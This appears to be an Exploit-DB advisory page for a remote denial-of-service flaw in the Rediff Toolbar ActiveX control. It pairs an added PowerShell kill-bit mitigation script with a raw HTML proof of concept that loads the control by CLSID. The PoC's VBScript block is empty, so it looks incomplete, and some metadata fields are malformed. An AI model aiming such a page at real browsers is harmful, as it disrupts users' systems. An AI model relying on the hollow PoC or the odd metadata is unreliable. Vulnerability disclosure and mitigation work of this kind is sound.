Vendor: Rediff Toolbar
By: Umesh Wanve
CVSS: 7.5 (HIGH)
CWE: Remote Denial of Service
Product Name: Rediff Toolbar
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Rediff Toolbar ActiveX Control Remote DOS Vulnerability

This exploit targets the Rediff Toolbar ActiveX Control and can be used to trigger a remote Denial of Service (DoS) attack. The vulnerability exists in the control's implementation, allowing an attacker to send a specially crafted request that can cause the control to crash or become unresponsive.

Mitigation:

The vendor has not provided a patch or mitigation for this vulnerability. It is recommended to disable or remove the Rediff Toolbar ActiveX Control from affected systems.
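
One way to carry out that recommendation without uninstalling the toolbar is Internet Explorer's ActiveX kill bit, a registry flag that stops IE from instantiating a given CLSID. The script below is an added example, not part of the original advisory: the CLSID is the one listed in the PoC header, the kill-bit mechanism is standard IE behaviour that the advisory itself does not mention, and the function names are illustrative.

```powershell
# Added example: block instantiation of the control in Internet Explorer by
# setting its kill bit. Run from an elevated PowerShell prompt.
$Clsid   = '{12F02779-6D88-4958-8AD3-83C12D86ADC7}'  # CLSID from the PoC header
$KillBit = 0x400                                     # "do not load" compatibility flag
$Name    = 'Compatibility Flags'

# 32-bit IE on 64-bit Windows reads the WOW6432Node view, so cover both.
$Roots = @('HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility')
if ([Environment]::Is64BitOperatingSystem) {
    $Roots += 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
}

function Get-CompatFlags([string]$Key) {
    # Returns the current flags, or 0 when the key or value is absent.
    $p = Get-ItemProperty -LiteralPath $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -ne $p) { [int]$p.$Name } else { 0 }
}

function Set-KillBit([string]$Root) {
    $key = Join-Path $Root $Clsid
    if (-not (Test-Path -LiteralPath $key)) {
        New-Item -Path $key -Force | Out-Null
    }
    # OR the bit in so any flags already present are preserved.
    $flags = (Get-CompatFlags $key) -bor $KillBit
    New-ItemProperty -LiteralPath $key -Name $Name -Value $flags `
        -PropertyType DWord -Force | Out-Null
}

foreach ($root in $Roots) {
    Set-KillBit $root
    # Read the value back so the change is verified, not assumed.
    $key = Join-Path $root $Clsid
    $ok  = ((Get-CompatFlags $key) -band $KillBit) -eq $KillBit
    '{0} -> kill bit set: {1}' -f $key, $ok
}
```

The kill bit only affects Internet Explorer and applications that host its browser control; other software that loads redifftoolbar.dll directly is not covered, so removal remains the more complete option.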
Source

Exploit-DB raw data:

<!--
              Rediff Toolbar ActiveX Control Remote DOS Vulnerability
                          By Umesh Wanve (umesh_345@yahoo.com)

Reference: https://www.securityfocus.com/bid/21924

Date: 08- Jan - 2007

// CLSID: {12F02779-6D88-4958-8AD3-83C12D86ADC7}
// Info: Rediff Toolbar
// ProgID: XBTB00001.XBTB00001.1
// InprocServer32: Program Files\\Rediff Toolbar\\2.0\\redifftoolbar.dll

-->


<html>

<body>
<OBJECT id="test" WIDTH=445 HEIGHT=40 classid="clsid:12F02779-6D88-4958-8AD3-83C12D86ADC7" >
</OBJECT>

<script language="vbscript">


</script>

</body>
</html>

# milw0rm.com [2007-03-08]